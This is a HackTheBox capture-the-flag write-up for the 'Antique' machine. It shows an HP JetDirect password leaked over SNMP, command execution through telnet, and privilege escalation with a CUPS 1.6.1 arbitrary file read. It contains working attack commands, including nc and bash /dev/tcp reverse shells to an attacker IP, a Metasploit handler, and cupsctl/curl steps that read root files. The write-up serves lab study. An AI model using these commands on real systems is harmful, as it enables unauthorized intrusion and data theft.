Antique Writeup Hackthebox

### Enumeration: ``` ┌──(tahaafarooq㉿kali)-[~/Desktop/hackthebox/machines/easy/antique] └─$ nmap -A 10.10.11.107 -oN nmap-scan -Pn Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-26 08:34 EDT Stats: 0:00:00 elapsed; 0 hosts completed (0 up), 0 undergoing Script Pre-Scan NSE Timing: About 0.00% done Nmap scan report for 10.10.11.107 Host is up (0.28s latency). Not shown: 999 closed ports PORT STATE SERVICE VERSION 23/tcp open telnet? | fingerprint-strings: | DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NotesRPC, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns, tn3270: | JetDirect | Password: | NULL: |_ JetDirect 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port23-TCP:V=7.91%I=7%D=10/26%Time=6177F62F%P=x86_64-pc-linux-gnu%r(NUL SF:L,F,"\nHP\x20JetDirect\n\n")%r(GenericLines,19,"\nHP\x20JetDirect\n\nPa SF:ssword:\x20")%r(tn3270,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(GetRe SF:quest,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(HTTPOptions,19,"\nHP\x SF:20JetDirect\n\nPassword:\x20")%r(RTSPRequest,19,"\nHP\x20JetDirect\n\nP SF:assword:\x20")%r(RPCCheck,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(DN SF:SVersionBindReqTCP,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(DNSStatus SF:RequestTCP,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(Help,19,"\nHP\x20 SF:JetDirect\n\nPassword:\x20")%r(SSLSessionReq,19,"\nHP\x20JetDirect\n\nP SF:assword:\x20")%r(TerminalServerCookie,19,"\nHP\x20JetDirect\n\nPassword SF::\x20")%r(TLSSessionReq,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(Kerb SF:eros,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(SMBProgNeg,19,"\nHP\x20 SF:JetDirect\n\nPassword:\x20")%r(X11Probe,19,"\nHP\x20JetDirect\n\nPasswo SF:rd:\x20")%r(FourOhFourRequest,19,"\nHP\x20JetDirect\n\nPassword:\x20")% SF:r(LPDString,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(LDAPSearchReq,19 SF:,"\nHP\x20JetDirect\n\nPassword:\x20")%r(LDAPBindReq,19,"\nHP\x20JetDir SF:ect\n\nPassword:\x20")%r(SIPOptions,19,"\nHP\x20JetDirect\n\nPassword:\ SF:x20")%r(LANDesk-RC,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(TerminalS SF:erver,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(NCP,19,"\nHP\x20JetDir SF:ect\n\nPassword:\x20")%r(NotesRPC,19,"\nHP\x20JetDirect\n\nPassword:\x2 SF:0")%r(JavaRMI,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(WMSRequest,19, SF:"\nHP\x20JetDirect\n\nPassword:\x20")%r(oracle-tns,19,"\nHP\x20JetDirec SF:t\n\nPassword:\x20")%r(ms-sql-s,19,"\nHP\x20JetDirect\n\nPassword:\x20" SF:)%r(afp,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(giop,19,"\nHP\x20Jet SF:Direct\n\nPassword:\x20"); Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 227.79 seconds ``` First thing hit up nmap , and found telnet service running up , let's try login into to it and see what happens: ``` ┌──(tahaafarooq㉿kali)-[~/Desktop/hackthebox/machines/easy/antique] └─$ telnet 10.10.11.107 Trying 10.10.11.107... Connected to 10.10.11.107. Escape character is '^]'. HP JetDirect Password: whoami Invalid password Connection closed by foreign host. ``` Alright it asks for a password! and the password can be seen in clear text! I now scan for UDP ports open in the IP and I found SNMP port opened but filtered I used the command `sudo nmap -sU -T4 10.10.11.107 -Pn` , I googled about how to get Jetdirect password from SNMP and ended up finding the solution in [exploit-DB](https://www.exploit-db.com/exploits/22319) , So with this command I got the password but in hex when I convert the hex chars I get plaintext password : ``` ┌──(tahaafarooq㉿kali)-[~/Desktop/hackthebox/machines/easy/antique] └─$ snmpget -v 1 -c public 10.10.11.107 .1.3.6.1.4.1.11.2.3.9.1.1.13.0 iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = BITS: 50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32 33 1 3 9 17 18 19 22 23 25 26 27 30 31 33 34 35 37 38 39 42 43 49 50 51 54 57 58 61 65 74 75 79 82 83 86 90 91 94 95 98 103 106 111 114 115 119 122 123 126 130 131 134 135 ``` ``` ┌──(tahaafarooq㉿kali)-[~/Desktop/hackthebox/machines/easy/antique] └─$ echo "50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32 33 1 3 9 17 18 19 22 23 25 26 27 30 31 33 34 35 37 38 39 42 43 49 50 51 54 57 58 61 65 74 75 79 82 83 86 90 91 94 95 98 103 106 111 114 115 119 122 123 126 130 131 134 135 " | xxd -r -p P@ssw0rd@123!!123�q��"2Rbs3CSs��$4�Eu�WGW�(8i IY�aA�"1&1A5 ``` So then the password is : `P@ssw0rd123!!123` ! ### Gaining Access Now then I just gain access: ``` ┌──(tahaafarooq㉿kali)-[~/Desktop/hackthebox/machines/easy/antique] └─$ telnet 10.10.11.107 Trying 10.10.11.107... Connected to 10.10.11.107. Escape character is '^]'. HP JetDirect Password: P@ssw0rd@123!!123 Please type "?" for HELP > ``` ``` > ? To Change/Configure Parameters Enter: Parameter-name: value <Carriage Return> Parameter-name Type of value ip: IP-address in dotted notation subnet-mask: address in dotted notation (enter 0 for default) default-gw: address in dotted notation (enter 0 for default) syslog-svr: address in dotted notation (enter 0 for default) idle-timeout: seconds in integers set-cmnty-name: alpha-numeric string (32 chars max) host-name: alpha-numeric string (upper case only, 32 chars max) dhcp-config: 0 to disable, 1 to enable allow: <ip> [mask] (0 to clear, list to display, 10 max) addrawport: <TCP port num> (<TCP port num> 3000-9000) deleterawport: <TCP port num> listrawport: (No parameter required) exec: execute system commands (exec id) exit: quit from telnet session ``` Since it allows shell execution I just grab me user flag first lol :) ``` > exec ls -la total 16 drwxr-xr-x 2 lp lp 4096 Sep 27 07:12 . drwxr-xr-x 6 root root 4096 May 14 10:52 .. lrwxrwxrwx 1 lp lp 9 May 14 11:03 .bash_history -> /dev/null -rwxr-xr-x 1 lp lp 1959 Sep 27 07:12 telnet.py -rwxrwxrwx 1 lp lp 33 Oct 26 12:37 user.txt > exec cat user.txt fe785308269fe780ec88b269e39fb0f0 ``` and I grab myself a shell ```bash > exec rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.6 1234 >/tmp/f ``` ### Elevating Privileges While studying the machine trying to escalate I discover a port opened in the inside which is 631 using the command `netstat -ant` ,I forward it using socat and relized it's cups 1.6.1 which has a metasploit post module : ``` $ socat tcp-listen:9090,fork tcp:127.0.0.1:631 & $ curl --request GET http://127.0.0.1:631/ % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 3792 100 3792 0 0 1851k 0 --:--:-- --:--:-- --:--:-- 1851k <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <HTML> <HEAD> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8"> <TITLE>Home - CUPS 1.6.1</TITLE> <LINK REL="STYLESHEET" TYPE="text/css" HREF="/cups.css"> <LINK REL="SHORTCUT ICON" HREF="/images/cups-icon.png" TYPE="image/png"> </HEAD> ``` I now start `msfconsole` and push the following commands: ``` msf6 > use exploit/multi/handler msf6 exploit(multi/handler) > set PAYLOAD linux/x64/shell/reverse_tcp PAYLOAD => linux/x64/shell/reverse_tcp msf6 exploit(multi/handler) > set LHOST tun0 LHOST => tun0 msf6 exploit(multi/handler) > set LPORT 1337 LPORT => 1337 msf6 exploit(multi/handler) > run [*] Started reverse TCP handler on 10.10.14.6:1337 ``` And now we have a listener so from the shell I have I send a rev shell connection to this listener and then use the post module to elevate my privs! -> shell I have: ``` $ bash -c "bash -i &>/dev/tcp/10.10.14.6/1337 <&1" ``` -> metasploit listener I set: ``` msf6 exploit(multi/handler) > run [*] Started reverse TCP handler on 10.10.14.6:1337 [*] Sending stage (38 bytes) to 10.10.11.107 [*] Command shell session 1 opened (10.10.14.6:1337 -> 10.10.11.107:34344) at 2021-10-26 09:31:35 -0400 lp@antique:~$ ``` and there I have a session , I know press control + Z to background the session so as I can load up the post module in that session to elevate privs: ``` msf6 exploit(multi/handler) > use multi/escalate/cups_root_file_read msf6 post(multi/escalate/cups_root_file_read) > set session 1 session => 1 msf6 post(multi/escalate/cups_root_file_read) > show options Module options (post/multi/escalate/cups_root_file_read): Name Current Setting Required Description ---- --------------- -------- ----------- ERROR_LOG /var/log/cups/error_log yes The original path to the CUPS error log FILE /etc/shadow yes The file to steal. SESSION 1 yes The session to run this module on. msf6 post(multi/escalate/cups_root_file_read) > set FILE /root/root.txt FILE => /root/root.txt ``` I set the file that I want to read and now I just run it up: ``` msf6 post(multi/escalate/cups_root_file_read) > run [!] SESSION may not be compatible with this module (incompatible session type: shell) [+] User in lpadmin group, continuing... [+] cupsctl binary found in $PATH [+] nc binary found in $PATH [*] Found CUPS 1.6.1 [+] File /root/root.txt (0 bytes) saved to /home/tahaafarooq/.msf4/loot/20211026094201_default_10.10.11.107_cups_file_read_512377.txt [*] Cleaning up... [*] Post module execution completed ``` Alright that's very weird it's not giving out what it's supposed to be giving :( , Now I cant get the root flag:(( , WAIT A MINUTE , I'll just exploit it manually ! Since we know the vulnerability affecting this version which allows us to read stuff then we just have to use `cupsctl` to set a log as a certain file then we read it! now enough talk let's get to the good part: ``` msf6 post(multi/escalate/cups_root_file_read) > sessions 1 [*] Starting interaction with 1... lp@antique:~$ id id uid=7(lp) gid=7(lp) groups=7(lp),19(lpadmin) lp@antique:~$ cupsctl ErrorLog="/root/root.txt" cupsctl ErrorLog="/root/root.txt" lp@antique:~$ curl http://127.0.0.1:631/admin/log/error_log? curl http://127.0.0.1:631/admin/log/error_log? % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 33 100 33 0 0 33000 0 --:--:-- --:--:-- --:--:-- 33000 b7ac8e0efb5c4945ab73981a6f860b75 ``` And there we go we have the flag:)) So first I set the `ErrorLog` as a file and since I did port forwarding so I know a way with the urls to read the logs the admin panel and all that, and to set the `ErrorLog` to a file I used this command: ```bash cupsctl ErrorLog="/root/root.txt" ``` Then I use curl to print out the logs of the error! since I set the error logs to read the file I set then I have my way DONE!: ``` lp@antique:~$ curl http://127.0.0.1:631/admin/log/error_log? ``` and boom we have the flag!